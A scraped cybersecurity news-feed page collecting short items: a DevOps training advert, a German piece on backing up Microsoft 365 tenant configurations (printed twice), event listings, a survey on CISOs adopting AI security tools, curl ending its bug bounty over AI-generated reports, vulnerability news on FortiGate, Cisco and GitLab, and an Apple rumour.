Why this matters: A clear workflow ensures consistent learning and measurable progress.
Real-World Use Cases & Scenarios
Dutch enterprises often hire DevOps Trainers in Netherlands to modernize legacy systems. Financial institutions rely on trainers to build compliant CI/CD pipelines. SaaS companies use trainers to scale Kubernetes clusters and automate monitoring. Developers learn build automation. QA teams implement automated testing. SREs strengthen reliability and incident response. Across sectors, DevOps training improves delivery speed and system resilience.
Why this matters: Real use cases prove tangible business value.
Benefits of Using DevOps Trainers in Netherlands
Productivity: Teams reduce manual effort and delays Reliability: Automated pipelines lower failure rates Scalability: Cloud-ready systems grow efficiently Collaboration: Shared ownership improves alignment Why this matters: Clear benefits justify strategic DevOps investment.
Challenges, Risks & Common Mistakes
Organizations often expect tools to solve cultural issues. Others adopt too many tools too quickly. Some teams ignore monitoring during early stages. DevOps Trainers address these risks by focusing on fundamentals and gradual adoption. They emphasize simplicity and business alignment.
Why this matters: Awareness prevents wasted time and failed transformations.
Comparison Table
AspectTraditional ITModern DevOpsDeploymentManualAutomatedRelease CycleSlowContinuousCollaborationSiloedUnifiedInfrastructureStaticCloud-basedTestingManualAutomatedScalabilityLimitedElasticMonitoringReactiveProactiveSecurityPost-releaseEmbeddedRecoverySlowFastFeedbackDelayedContinuous Why this matters: Comparison highlights why DevOps training is essential.
Best Practices & Expert Recommendations
Successful DevOps Trainers in Netherlands emphasize fundamentals first. They promote automation with control. They encourage monitoring from the beginning. They align DevOps practices with business outcomes. This approach ensures sustainability and long-term success.
Why this matters: Best practices prevent future scalability issues.
Who Should Learn or Use DevOps Trainers in Netherlands?
Developers gain insight into deployment pipelines. DevOps engineers refine automation skills. Cloud and SRE teams improve stability. QA teams adopt automated testing. Beginners build strong foundations. Experienced professionals optimize delivery systems.
Why this matters: Broad relevance drives organizational maturity.
FAQs – People Also Ask
What are DevOps Trainers in Netherlands?
They are experts who teach real-world DevOps practices.
Why this matters: Clear definitions improve understanding.
Is DevOps training beginner-friendly?
Yes, trainers adapt learning paths.
Why this matters: Safe entry reduces learning fear.
Do enterprises need DevOps trainers?
Yes, to standardize and scale delivery.
Why this matters: Standardization improves efficiency.
How long does DevOps training take?
It depends on goals and experience.
Why this matters: Planning improves results.
Is DevOps in demand in the Netherlands?
Yes, across multiple industries.
Why this matters: Skills remain future-proof.
Do trainers focus only on tools?
No, they emphasize culture and process.
Why this matters: Sustainable DevOps needs balance.
Can QA teams benefit from DevOps?
Yes, through automation and CI integration.
Why this matters: Quality improves earlier.
Is security included in training?
Yes, through DevSecOps practices.
Why this matters: Security reduces risk.
Do trainers teach cloud platforms?
Yes, AWS, Azure, and GCP concepts.
Why this matters: Cloud skills remain critical.
Does DevOps training improve uptime?
Yes, through monitoring and automation.
Why this matters: Reliability protects users.
Branding & Authority
DevOpsSchool is a globally trusted learning platform delivering enterprise-grade DevOps education through practical and proven methods. Through its programs, DevOpsSchool supports professionals and organizations seeking DevOps Trainers in Netherlands with industry-aligned training models, real-world use cases, and scalable learning frameworks. Enterprises trust this platform for outcome-focused DevOps transformation.
Why this matters: Trusted platforms ensure consistent learning quality.
Rajesh Kumar acts as a senior mentor with more than 20 years of hands-on experience. Through Rajesh Kumar, learners access expert guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentoring bridges the gap between theory and enterprise execution.
Why this matters: Experienced mentors accelerate skill mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329




View the full article

• 0 comments
• 48 views

reporter

January 22Jan 22

Warum Microsoft-365-Konfigurationen geschützt werden müssen

Warum Microsoft-365-Konfigurationen geschützt werden müssen

IB Photography – shutterstock.com
Im Jahr 2010 war Office 365 eine einfache Suite mit Office-Anwendungen und zusätzlicher E-Mail-Funktion. Das hat sich 15 Jahre später mit Microsoft 365 geändert: Die Suite ist ein wesentliches Element in den Bereichen Kommunikation, Zusammenarbeit und Sicherheit. Dienste wie Entra, Intune, Exchange, Defender, Teams und SharePoint verfügen über Tausende von Konfigurationsdetails, die dafür sorgen, dass Unternehmen reibungslos und sicher laufen. Wenn diese verloren gehen, versehentlich gelöscht oder absichtlich geändert werden, hat das enorme Auswirkungen auf die Geschäftsabläufe.
Dabei geht es um weit mehr als nur um Daten. Die Tenant-Konfigurationen sind die Blaupause für den Betrieb der M365-Umgebung. Einfach ausgedrückt: Wenn der Microsoft-365-Tenant ausfällt, fällt auch der Geschäftsbetrieb aus.
Trotz dieser enormen Bedeutung der Tenant-Konfigurationen ist in der IT-Welt eine Fehlannahme weit verbreitet: Rund die Hälfte aller IT-Verantwortlichen geht fälschlicherweise davon aus, dass die nativen Backup-Lösungen von Microsoft einen umfassenden Schutz für wichtige Tenant-Konfigurationen, -Einstellungen und -Richtlinien bieten. Um es deutlich zu sagen: Microsoft sichert die Konfigurationen nicht und kann sie folglich auch nicht wiederherstellen. Dies liegt gemäß dem Modell der „shared responsibility“ in der Verantwortung der Anwender.
Die Bedeutung der Tenant-Konfigurationen
Tenant-Konfigurationen sind die digitale Grundlage für die Sicherheitslage und die betriebliche Integrität eines Unternehmens. Sie umfassen über 10.000 einzigartige Richtlinienelemente für kritische Dienste. Sie regeln den Benutzerzugriff, die Compliance und das Anwendungsverhalten, also alles, was für den reibungslosen Ablauf eines Unternehmens unerlässlich ist:
Sicherheitseinstellungen: Diese erste Verteidigungslinie umfasst Richtlinien für den bedingten Zugriff, die festlegen, wer von wo aus auf was zugreifen darf, sowie Regeln für die Multi-Faktor-Authentifizierung (MFA). Gehen diese Einstellungen verloren oder werden sie manipuliert, haben Angreifer ein leichtes Spiel und können Perimeter-Kontrollen einfach umgehen. Identitätsmanagement: Nahezu jedes Unternehmen (95 Prozent) war in den vergangenen 18 Monaten von einer Cloud-bezogenen Sicherheitsverletzung betroffen, wobei die meisten davon auf unsichere Identitäten zurückgeführt werden konnten. Benutzer- und Gruppeneinstellungen, Administratorrollen und App-Berechtigungen in Entra ID (ehemals Azure AD) bilden den Kern der Identitätssicherheit. Wenn diese kompromittiert werden, bricht das gesamte Framework zusammen. Compliance-Richtlinien: In regulierten Branchen ist der Nachweis der Regeltreue unverzichtbar. Policies zum Schutz vor Datenverlust (Data Loss Prevention, DLP) verhindern, dass sensible Informationen das Unternehmen verlassen, während Aufbewahrungsrichtlinien sicherstellen, dass Daten für rechtliche und Prüfungszwecke aufbewahrt werden. Kann ein Unternehmen die Einhaltung der Vorgaben nicht nachweisen, drohen empfindliche Strafen. Einstellungen für die Zusammenarbeit: Richtlinien in Teams, SharePoint und Exchange regeln die externe Freigabe, den Gastzugriff und den Datenfluss. Wenn diese Einstellungen fehlen oder falsch konfiguriert sind, riskieren Unternehmen eine unkontrollierte Offenlegung von Daten. Dadurch vergrößert sich die Angriffsfläche erheblich. Die Integrität dieser Einstellungen ist das Rückgrat jeder Zero-Trust-Architektur. Ohne korrekte Konfigurationen lassen sich weder das Least-Privilege-Prinzip durchsetzen noch die Compliance einhalten. Entsprechend ist der Verlust der Konfigurationen keine bloße Unannehmlichkeit, sondern bedeutet einen erheblichen Kontrollverlust über die gesamte digitale Infrastruktur.
Häufig übersehen, aber essenziell
Das Fehlen von Konfigurations-Backups ist nicht nur eine potenzielle Security-Katastrophe, sondern spiegelt auch ein fundamentales Missverständnis darüber wider, was Microsoft 365 eigentlich ist. Dabei handelt es sich eben nicht um eine einfache Lösung. Vielleicht kann man es sich wie ein Glas Wasser vorstellen: Der Tenant ist das Glas und das Wasser sind die Daten.
Nicht alle Vorfälle, die Konfigurationen gefährden, sind gleich schwerwiegend. Auf der einen Seite des Spektrums können geringfügige Manipulationen an wichtigen Konfigurationen zwar ärgerlich sein, stellen jedoch keine existenzielle Bedrohung für das Unternehmen dar. Auf der anderen Seite könnten Sicherheitsverantwortliche damit konfrontiert werden, dass die Identitätsinfrastruktur und Sicherheitsvorkehrungen großflächig gelöscht worden, was eine Katastrophe mit potenziell existenzbedrohenden Folgen für das Unternehmen darstellt.
Treten kleinere Fehlkonfigurationen auf, wie zum Beispiel versehentlich geänderten Berechtigungen eines einzelnen Benutzers, kann die Fehlerbehebung zwar Stunden dauern, stellt aber letztlich keine existenzielle Krise für das Unternehmen dar. Es ist vergleichbar mit einem angestoßenen Glas: Man kann es problemlos und ohne Risiko nutzen, auch wenn es nicht ideal ist.
Wenn ein fehlerhaftes PowerShell-Skript einen bestimmten Dienst für eine begrenzte Anzahl von Benutzern unterbricht, verlangsamt dies die Produktivität und führt zu Störungen des Geschäftsbetriebs. Allerdings kann das Skript wiederhergestellt werden, auch wenn der Ausfall unbequem und zeitaufwändig ist. Dies ist vergleichbar mit einem gesprungenen Glas. Es ist zwar noch verwendbar, aber das Risiko für die Stabilität des Glases steigt.
Ein vollständiger Verlust der Tenant-Konfigurationen führt schließlich zu massiven Ausfallzeiten und bedeutet für Unternehmen ohne Konfigurations-Backups das reine Chaos. Bedeutende Richtlinien wie Authentifizierung, E-Mail-Fluss oder Zugriffskontrolle wurden beschädigt, manipuliert oder versehentlich gelöscht, wodurch der gesamte digitale Arbeitsbereich unbrauchbar ist. Das Glas ist zerschellt. Erst wenn ein neues zur Verfügung steht, also der Tenant auf sichere Weise wiederhergestellt wurde, kann man auch wieder mit den Daten arbeiten (also das Wasser einfüllen, ohne dass es gleich wieder irgendwo ausläuft).
Ohne Konfigurations-Backups, einschließlich Richtlinien, Berechtigungseinstellungen und Benutzerrollen, können Unternehmen nur mit enorm hohem Zeit- und Ressourcenaufwand zum sicheren Ausgangszustand zurückkehren. Deshalb führt an einem intelligenten Konfigurations-Backup kein Weg vorbei. Seit Jahren ist die Sicherung kritischer Daten für Unternehmen eine Selbstverständlichkeit. Es ist höchste Zeit, dass auch die Sicherung des Tenants flächendeckend umgesetzt wird. (jm)
View the full article

• 0 comments
• 65 views

CSOonline

January 22Jan 22

Warum Microsoft-365-Konfigurationen geschützt werden müssen

Warum Microsoft-365-Konfigurationen geschützt werden müssen

IB Photography – shutterstock.com
Im Jahr 2010 war Office 365 eine einfache Suite mit Office-Anwendungen und zusätzlicher E-Mail-Funktion. Das hat sich 15 Jahre später mit Microsoft 365 geändert: Die Suite ist ein wesentliches Element in den Bereichen Kommunikation, Zusammenarbeit und Sicherheit. Dienste wie Entra, Intune, Exchange, Defender, Teams und SharePoint verfügen über Tausende von Konfigurationsdetails, die dafür sorgen, dass Unternehmen reibungslos und sicher laufen. Wenn diese verloren gehen, versehentlich gelöscht oder absichtlich geändert werden, hat das enorme Auswirkungen auf die Geschäftsabläufe.
Dabei geht es um weit mehr als nur um Daten. Die Tenant-Konfigurationen sind die Blaupause für den Betrieb der M365-Umgebung. Einfach ausgedrückt: Wenn der Microsoft-365-Tenant ausfällt, fällt auch der Geschäftsbetrieb aus.
Trotz dieser enormen Bedeutung der Tenant-Konfigurationen ist in der IT-Welt eine Fehlannahme weit verbreitet: Rund die Hälfte aller IT-Verantwortlichen geht fälschlicherweise davon aus, dass die nativen Backup-Lösungen von Microsoft einen umfassenden Schutz für wichtige Tenant-Konfigurationen, -Einstellungen und -Richtlinien bieten. Um es deutlich zu sagen: Microsoft sichert die Konfigurationen nicht und kann sie folglich auch nicht wiederherstellen. Dies liegt gemäß dem Modell der „shared responsibility“ in der Verantwortung der Anwender.
Die Bedeutung der Tenant-Konfigurationen
Tenant-Konfigurationen sind die digitale Grundlage für die Sicherheitslage und die betriebliche Integrität eines Unternehmens. Sie umfassen über 10.000 einzigartige Richtlinienelemente für kritische Dienste. Sie regeln den Benutzerzugriff, die Compliance und das Anwendungsverhalten, also alles, was für den reibungslosen Ablauf eines Unternehmens unerlässlich ist:
Sicherheitseinstellungen: Diese erste Verteidigungslinie umfasst Richtlinien für den bedingten Zugriff, die festlegen, wer von wo aus auf was zugreifen darf, sowie Regeln für die Multi-Faktor-Authentifizierung (MFA). Gehen diese Einstellungen verloren oder werden sie manipuliert, haben Angreifer ein leichtes Spiel und können Perimeter-Kontrollen einfach umgehen. Identitätsmanagement: Nahezu jedes Unternehmen (95 Prozent) war in den vergangenen 18 Monaten von einer Cloud-bezogenen Sicherheitsverletzung betroffen, wobei die meisten davon auf unsichere Identitäten zurückgeführt werden konnten. Benutzer- und Gruppeneinstellungen, Administratorrollen und App-Berechtigungen in Entra ID (ehemals Azure AD) bilden den Kern der Identitätssicherheit. Wenn diese kompromittiert werden, bricht das gesamte Framework zusammen. Compliance-Richtlinien: In regulierten Branchen ist der Nachweis der Regeltreue unverzichtbar. Policies zum Schutz vor Datenverlust (Data Loss Prevention, DLP) verhindern, dass sensible Informationen das Unternehmen verlassen, während Aufbewahrungsrichtlinien sicherstellen, dass Daten für rechtliche und Prüfungszwecke aufbewahrt werden. Kann ein Unternehmen die Einhaltung der Vorgaben nicht nachweisen, drohen empfindliche Strafen. Einstellungen für die Zusammenarbeit: Richtlinien in Teams, SharePoint und Exchange regeln die externe Freigabe, den Gastzugriff und den Datenfluss. Wenn diese Einstellungen fehlen oder falsch konfiguriert sind, riskieren Unternehmen eine unkontrollierte Offenlegung von Daten. Dadurch vergrößert sich die Angriffsfläche erheblich. Die Integrität dieser Einstellungen ist das Rückgrat jeder Zero-Trust-Architektur. Ohne korrekte Konfigurationen lassen sich weder das Least-Privilege-Prinzip durchsetzen noch die Compliance einhalten. Entsprechend ist der Verlust der Konfigurationen keine bloße Unannehmlichkeit, sondern bedeutet einen erheblichen Kontrollverlust über die gesamte digitale Infrastruktur.
Häufig übersehen, aber essenziell
Das Fehlen von Konfigurations-Backups ist nicht nur eine potenzielle Security-Katastrophe, sondern spiegelt auch ein fundamentales Missverständnis darüber wider, was Microsoft 365 eigentlich ist. Dabei handelt es sich eben nicht um eine einfache Lösung. Vielleicht kann man es sich wie ein Glas Wasser vorstellen: Der Tenant ist das Glas und das Wasser sind die Daten.
Nicht alle Vorfälle, die Konfigurationen gefährden, sind gleich schwerwiegend. Auf der einen Seite des Spektrums können geringfügige Manipulationen an wichtigen Konfigurationen zwar ärgerlich sein, stellen jedoch keine existenzielle Bedrohung für das Unternehmen dar. Auf der anderen Seite könnten Sicherheitsverantwortliche damit konfrontiert werden, dass die Identitätsinfrastruktur und Sicherheitsvorkehrungen großflächig gelöscht worden, was eine Katastrophe mit potenziell existenzbedrohenden Folgen für das Unternehmen darstellt.
Treten kleinere Fehlkonfigurationen auf, wie zum Beispiel versehentlich geänderten Berechtigungen eines einzelnen Benutzers, kann die Fehlerbehebung zwar Stunden dauern, stellt aber letztlich keine existenzielle Krise für das Unternehmen dar. Es ist vergleichbar mit einem angestoßenen Glas: Man kann es problemlos und ohne Risiko nutzen, auch wenn es nicht ideal ist.
Wenn ein fehlerhaftes PowerShell-Skript einen bestimmten Dienst für eine begrenzte Anzahl von Benutzern unterbricht, verlangsamt dies die Produktivität und führt zu Störungen des Geschäftsbetriebs. Allerdings kann das Skript wiederhergestellt werden, auch wenn der Ausfall unbequem und zeitaufwändig ist. Dies ist vergleichbar mit einem gesprungenen Glas. Es ist zwar noch verwendbar, aber das Risiko für die Stabilität des Glases steigt.
Ein vollständiger Verlust der Tenant-Konfigurationen führt schließlich zu massiven Ausfallzeiten und bedeutet für Unternehmen ohne Konfigurations-Backups das reine Chaos. Bedeutende Richtlinien wie Authentifizierung, E-Mail-Fluss oder Zugriffskontrolle wurden beschädigt, manipuliert oder versehentlich gelöscht, wodurch der gesamte digitale Arbeitsbereich unbrauchbar ist. Das Glas ist zerschellt. Erst wenn ein neues zur Verfügung steht, also der Tenant auf sichere Weise wiederhergestellt wurde, kann man auch wieder mit den Daten arbeiten (also das Wasser einfüllen, ohne dass es gleich wieder irgendwo ausläuft).
Ohne Konfigurations-Backups, einschließlich Richtlinien, Berechtigungseinstellungen und Benutzerrollen, können Unternehmen nur mit enorm hohem Zeit- und Ressourcenaufwand zum sicheren Ausgangszustand zurückkehren. Deshalb führt an einem intelligenten Konfigurations-Backup kein Weg vorbei. Seit Jahren ist die Sicherung kritischer Daten für Unternehmen eine Selbstverständlichkeit. Es ist höchste Zeit, dass auch die Sicherung des Tenants flächendeckend umgesetzt wird. (jm)
View the full article

• 0 comments
• 67 views

CSOonline

January 22Jan 22

CISO Middle East Summit 2026 – Doha

CISO Middle East Summit 2026 – Doha

CISO Middle East Summit – Doha, Qatar | 22nd January 2026
The CISO Middle East Summit 2026, taking place on 22nd January in Doha, Qatar, stands as one of the region’s most anticipated gatherings for cybersecurity leaders, innovators, and policymakers. Under the theme “Digital Freedom & Resilience: The Pillars of Qatar’s Cyber Vision 2030,” the summit will unite key decision-makers from government, critical infrastructure, and enterprise sectors to shape the future of cybersecurity in the Middle East.
The event will feature thought-provoking discussions, strategic insights, and real-world case studies that address the evolving cyber threat landscape and the increasing need for digital trust, resilience, and collaboration. With participation from senior cybersecurity executives, government representatives, and technology experts, the summit will highlight emerging trends in AI security, regulatory evolution, and national cyber defense.
Beyond its knowledge-sharing sessions, the CISO Middle East Summit offers a unique networking platform for CISOs, solution providers, and innovators to connect and explore partnerships that drive the region’s cybersecurity maturity. Supported by leading sponsors and media partners, this one-day event in Doha reinforces Qatar’s growing position as a hub for digital innovation and cyber resilience.
For those driving the next phase of security transformation, this summit is a defining milestone in the Middle East’s cybersecurity journey.
The post CISO Middle East Summit 2026 – Doha appeared first on CISO MAG | Cyber Security Magazine.
View the full article

• 0 comments
• 53 views

CISOmag

January 22Jan 22

73% of CISOs more likely to consider AI-enabled security solution

73% of CISOs more likely to consider AI-enabled security solution

CISO’s are increasingly turning to AI-enabled security technologies to augment their organizations’ cyber defense and extend the capabilities of their teams.
According to Foundry’s latest Security Priorities Study, 73% of security decision-makers are now more likely to consider a security solution that uses artificial intelligence, up from 59% the year prior.
CISOs plan to leverage AI in a range of security functions, including malware detection, threat detection, anomaly detection, real-time risk prediction, and audit and compliance. They are also eyeing AI for automating security responses, performing authentication, ensuring data loss prevention, and improving enterprise system visibility.
CSO
Survey respondents cited AI-enabled benefits such as faster detection of unknown threats, accelerating response times, and automating security tasks to reduce employee workload. The findings are in line with an October 2025 study from management consultancy PwC, which found AI ahead of cloud security and data protection as the top cybersecurity investment priority for enterprises over the next 12 months.
But cutting through the hype to ensure AI investments have optimal impact remains an issue. Experts quizzed by CSO said that security leaders should prioritize AI investment over the next 12 to 18 months to boost anomaly detection, enhance identity and access management, and automate response, but they should also be aware of potential pitfalls such as hallucinations, over-reliance on AI, and governance gaps when implementing AI in their security strategies.
Cutting through the noise
Oliver Newbury, chief strategy officer at cyber resilience vendor Halcyon and previously CISO at Barclays, tells CSO that the “strongest uses of AI in security are the ones that improve visibility and reduce noise.”
“Teams need clearer signals, earlier warnings, and quicker routes to certainty in the middle of an unfolding incident,” Newbury says. “AI that can sift large volumes of activity, highlight meaningful patterns, and present them in a way that analysts can act on immediately is where organizations see real benefit.”
Newbury adds: “These capabilities help shorten investigation time and support faster, confident decision-making during high-pressure situations.”
A human-led approach is no longer sufficient to deal with the increased complexity and volume of threats, many security experts contend. Strategic use of AI technology has the potential to recognize patterns of attack and offer analysts the ability to cut through the noise and make better decisions, freeing up time and resources to deal with higher-value security work and move beyond constant firefighting.
“Most security teams are overloaded, and not because they lack tools, but because they lack time and clear signals,” Newbury says. “AI earns its keep in the areas where speed and pattern recognition genuinely outperform manual effort: behavioral anomaly detection, early-stage threat indicators, and the subtle identity-related activity that often precedes a ransomware event.”
Check against delivery
David Tyler, founder of tech consultancy Outlier Technology, warns that some vendors slap the label ‘AI’ on existing capabilities while adding a higher price tag combined with solid product development and real advances from others.
“A lot of what’s being sold as breakthrough AI is actually decades-old technology finally being implemented properly; this isn’t necessarily bad, as good product management matters as much as novel algorithms,” Tyler says. “But if a vendor’s ‘AI security solution’ appeared overnight in the last couple of years, you’re probably looking at rebranding rather than genuine capability building.”
CSO / Foundry
CSOs should be asking how long the vendor has been investing in these capabilities and what their product evolution looks like, according to Tyler.
“Companies that have been building graph-based correlation, adaptive baselining, and behavioral analytics for a decade are very different from those who just added an AI chat function to their user interface and called it innovation,” Tyler says.
Dr. Andrew Bolster, senior manager of R&D at application security vendor Black Duck, also warns CISOs about vendors slapping neural networks onto existing tools without fixing underlying data quality issues.
“Your AI-powered authentication system is only as good as your identity data hygiene,” Dr. Bolster says. “Your AI-powered malware detection is only as good as your sample corpus quality and labelling accuracy.”
Dr Bolster adds: “Before signing contracts for AI security platforms, audit your data governance maturity.”
Bolster also argues that CISOs themselves should focus more on how to build an AI-ready security data platform rather than which security tools they need to buy.
“CISOs should invest in data mesh architectures that treat security telemetry as a first-class data product with defined ownership, quality SLAs [service level agreements], and standardized schemes,” he says.
Building an AI security platform
Merlin Gillespie, operations director at managed security services provider Cybanetix, sees the AI security market maturing — and moving away from point solutions that offer reduced operational expenditure toward a more integrated approach. Gillespie warns that this shift creates fresh challenges for security leaders.
“These days every security tool has a layer of AI ‘assistance’ but instead of simplifying operations this is creating overlapping tools, inconsistent reporting, and unclear provenance of data,” according to Gillespie. “The learning is that AI-labelled tools are helpful but aren’t a solution in themselves.”
The exercise most organizations face is classifying which processes are eligible for automation, and which of these are enhanced by the determinism and reasoning of AI, Gillespie advises.
“Security teams should apply the same top-down analysis used across their wider business to support software and personnel efficiency, rather than being led by vendor tooling which can result in further siloing,” Gillespie says.
Potential pitfalls
Halcyon’s Newbury warned that these issues were far from the only potential pitfalls that come from deploying AI systems. For example, over-reliance on AI systems can lead to greater risk.
“AI shouldn’t replace the fundamentals such as asset management, patching, identity governance, proper segmentation, or tested recovery plans,” Newbury says. “Those disciplines matter even more as attackers adopt AI at speed.”
Issues inherited from the inadequate training of AI systems can also create problems.
“AI systems can easily inherit blind spots if they’re trained on narrow or unrealistic datasets,” he says. “CISOs must understand how models are trained and where their assumptions break down.”
Ransomware remains the clearest test of whether AI investment is being prioritized in the right places, Newbury argues.
“Most modern [ransomware] incidents are effectively identity-based attacks,” Newbury says. “Attackers are logging in rather than ‘hacking in,’ often armed with credentials harvested at scale by infostealers.”
Newbury adds: “As adversaries fold AI into their operations, you’ll see more of these attacks landing faster and hitting harder. That makes the resilience question far more urgent.”
Newbury concludes: “AI is worth the investment but only where it sharpens decision-making, reduces noise, and gives teams the time and clarity to act before a problem becomes a crisis.”
View the full article

• 0 comments
• 30 views

CSOonline

January 22Jan 22

Curl eliminates bug bounty program due to AI slop

Curl eliminates bug bounty program due to AI slop

Lately, the Curl code library has been receiving a lot of AI-generated reports from users hoping to receive financial compensation from the tool’s bug bounty program.
Going through all the reports has taken up so many resources that Curl has decided to eliminate compensation for bug hunters altogether.
“AI slop and generally bad reports have only increased even more recently, so we have to make an attempt to slow down the river so as not to drown,” Curl’s chief administrator Daniel Stenberg said in a comment to Elektroniktidningen.
Over the years, Curl has distributed a total of $101,020 in compensation for bug hunter reports.
Curl is not alone in enduring the significant changes in the bounty industry due to AI-powered bug hunting, which democratizes and accelerates vulnerability discovery while also taxing bug bounty programs with false positives and “AI slop.”
View the full article

• 0 comments
• 37 views

CSOonline

January 22Jan 22

WAM Morocco

WAM Morocco

WAM Morocco 2026 is organised by KAOUN International (a subsidiary of Dubai World Trade Centre) and proudly in association with GITEX Africa. The debut event is set to be the continent’s largest tech and start-up event in advanced manufacturing and future mobility.
WAM Morocco will take place under the auspices of the Moroccan Ministry of Industry and Trade from 20 – 22 January 2026 at Foire Internationale de Casablanca, Morocco. Expected to draw over 350 exhibitors and more than 20,000 high-level corporate buyers, WAM Morocco will be the hub where the entire industrial innovation ecosystem connects and collaborates.
WAM Morocco features four co-located events World Advanced Future Mobility (WAFM), World Green Energy (WGE), World Pharma Manufacturing (WPM) and World Digital Food Hub (WDFH). Cutting-edge technologies in AI, quantum computing, 3D printing, blockchain and mixed reality will take centre stage at WAM Morocco and drive forward Morocco’s vision of becoming a globally competitive and sustainable manufacturing capital.
The post WAM Morocco appeared first on CISO MAG | Cyber Security Magazine.
View the full article

• 0 comments
• 52 views

CISOmag

January 22Jan 22

Automated FortiGate Attacks Exploit FortiCloud SSO to Alter Firewall Configurations

Automated FortiGate Attacks Exploit FortiCloud SSO to Alter Firewall Configurations

Cybersecurity company Arctic Wolf has warned of a "new cluster of automated malicious activity" that involves unauthorized firewall configuration changes on Fortinet FortiGate devices. The activity, it said, commenced on January 15, 2026, adding it shares similarities with a December 2025 campaign in which malicious SSO logins on FortiGate appliances were recorded against the admin account fromView the full article

• 0 comments
• 50 views

Hacker News

January 22Jan 22

Cisco Fixes Actively Exploited Zero-Day CVE-2026-20045 in Unified CM and Webex

Cisco Fixes Actively Exploited Zero-Day CVE-2026-20045 in Unified CM and Webex

Cisco has released fresh patches to address what it described as a "critical" security vulnerability impacting multiple Unified Communications (CM) products and Webex Calling Dedicated Instance that it has been actively exploited as a zero-day in the wild. The vulnerability, CVE-2026-20045 (CVSS score: 8.2), could permit an unauthenticated remote attacker to execute arbitrary commands on theView the full article

• 0 comments
• 43 views

Hacker News

January 22Jan 22

Apple's Upcoming Home Hub Could Include 'Robotic Swiveling Base'

Apple's Upcoming Home Hub Could Include 'Robotic Swiveling Base'

The home hub device that Apple plans to release as soon as this spring has a "robotic swiveling base," according to The Information's Wayne Ma. Ma mentioned the new detail in a piece outlining Apple's work on an AI pin.



We've heard a lot of rumors about the home hub because it was supposed to launch in 2025, but to date, no rumors have suggested that it will have a swiveling robotic base. Bloomberg's Mark Gurman previously said that Apple is developing two versions of the hub, one that's meant to be mounted on the wall and another that has a HomePod mini-like speaker base that can be placed on a desktop or countertop.

No prior descriptions of the home hub base have suggested that it will have any kind of swivel function or that it will be robotic. In fact, the wording sounds similar to how Gurman has described Apple's tabletop robot, which will be a 2027 follow up to the home hub.

Gurman said the tabletop robot will have an iPad-like display mounted on a thin robotic arm that allows the display to tilt up and down and rotate 360 degrees. The device will be able to reposition itself to face whoever is speaking, and it is said to have a "visual personality."

Ma did not go into detail on the purpose of the robotic swiveling base, or how it will work, but presumably it would be able to move to face people. The home hub is supposed to have an array of sensors that let it determine when someone is in the room.

We are expecting the home hub to launch in the coming months, right around the time that Apple debuts iOS 26.4 with the upgraded version of Siri.Tags: Apple Command Center, Apple Robot
This article, "Apple's Upcoming Home Hub Could Include 'Robotic Swiveling Base'" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 28 views

reporter

January 22Jan 22

GitLab 2FA login protection bypass lets attackers take over accounts

GitLab 2FA login protection bypass lets attackers take over accounts

A critical two-factor authentication bypass vulnerability in the Community and Enterprise editions of the GitLab application development platform has to be patched immediately, say experts.
The hole is one of five vulnerabilities patched Wednesday as part of new versions of GitLab. Three are ranked High in severity, including the 2FA bypass issue, while the other two are ranked Medium in severity.
GitLab says the 2FA hole, CVE-2026-0723, if exploited on an unpatched system, could allow an individual with knowledge of a victim’s ID credentials to bypass two-factor authentication by submitting forged device responses.
It’s this hole that has drawn the attention of experts, because of the implications.
The goal of multifactor authentication is to protect login accounts with an extra verification step in case usernames and passwords are stolen. If a threat actor can access an account, they can do almost unlimited damage to IT systems.
In the case of GitLab, if critical code is sitting in a developer’s account, a threat actor could compromise it, notes David Shipley, head of Canadian-based security awareness training firm Beauceron Security. If that code is to be used in software that can be downloaded or sold to other organizations, then inserted malware could be spread in a supply chain attack. The latest example, Shipley said, is the Shai-Hulud worm, which is spreading because a developer’s account in the npm registry was hacked.
If the code contains cloud secrets, he added, the threat actor could gain access to cloud platforms like Azure, Amazon Web Service, or Google Cloud Platform.
Discovery of the 2FA bypass hole “is a reminder that these [security] controls are important,” Shipley said in an interview. “They absolutely help reduce a number of risks: Brute force attacks, password spraying, and so forth. But they will never be infallible.
“This is not the first time someone has found a clever way to get around 2FA challenges. We have a whole series of attacks around session cookie capture which are also designed to defeat 2FA. So it’s important to remember this when someone drops some Silver Bullet thinking that ‘This magic solution solves it [authentication]’ or ‘That’s the bad MFA. Here’s the new MFA.’ And I include [trusting only] Yubikeys,” he said. “Yubikeys are amazing. They’re the next generation of 2FA. But because they are made for humans, eventually they will have some flaws.”
Even if there weren’t flaws in these controls, employees might be tricked into giving up credentials through social engineering, he added.
It would be easier for an attacker to use techniques like phishing to collect user credentials rather than forge a device credential to exploit this particular 2FA bypass, said Johannes Ullrich, dean of research at the SANS Institute. But, he added, once the attacker has access to valid passwords, they can log in to the GitLab server and perform actions on the source code — download it, alter it or delete it — just as a legitimate user would.
What infosec leaders need to do
This is why Cybersecurity 101 — layered defense — is vital for identity and access management, Shipley said. That includes forcing employees to have long, unique login passwords, monitoring the network for unusual activity (for example, if someone gets in without an MFA challenge recorded) and, in case all fails, an incident response plan.
MFA bypass vulnerabilities are very common, noted Ullrich. “The core problem is usually that MFA was added later to an existing product,” he said, “and some features may not properly check if MFA was successfully completed.”
When testing a multifactor authentication solution, infosec leaders should always verify that an application has not marked authentication as completed after the username and password were verified. Enabling MFA should not relax password requirements, he asserted. Users must still pick unique, secure passwords and use password managers to manage them. Secure passwords will mostly mitigate any MFA failures, Ullrich said.
Any vulnerability found in GitLab is significant, he added. GitLab is typically used by organizations concerned enough about the confidentiality of their code that they want to run the platform on premises. 
GitLab ‘strongly’ recommends upgrades
In describing the patches released Wednesday, GitLab said it “strongly” recommends all self managed GitLab installations be upgraded to one of the three new versions (18.8.2, 18.7.2, 18.6.4) for GitLab Community Edition (CE) and Enterprise Edition (EE). Those using GitLab.com or GitLab Dedicated –  a single tenant software-as-a-service version –  don’t have to take any action.
The other vulnerabilities fixed in Wednesday’s updates are:
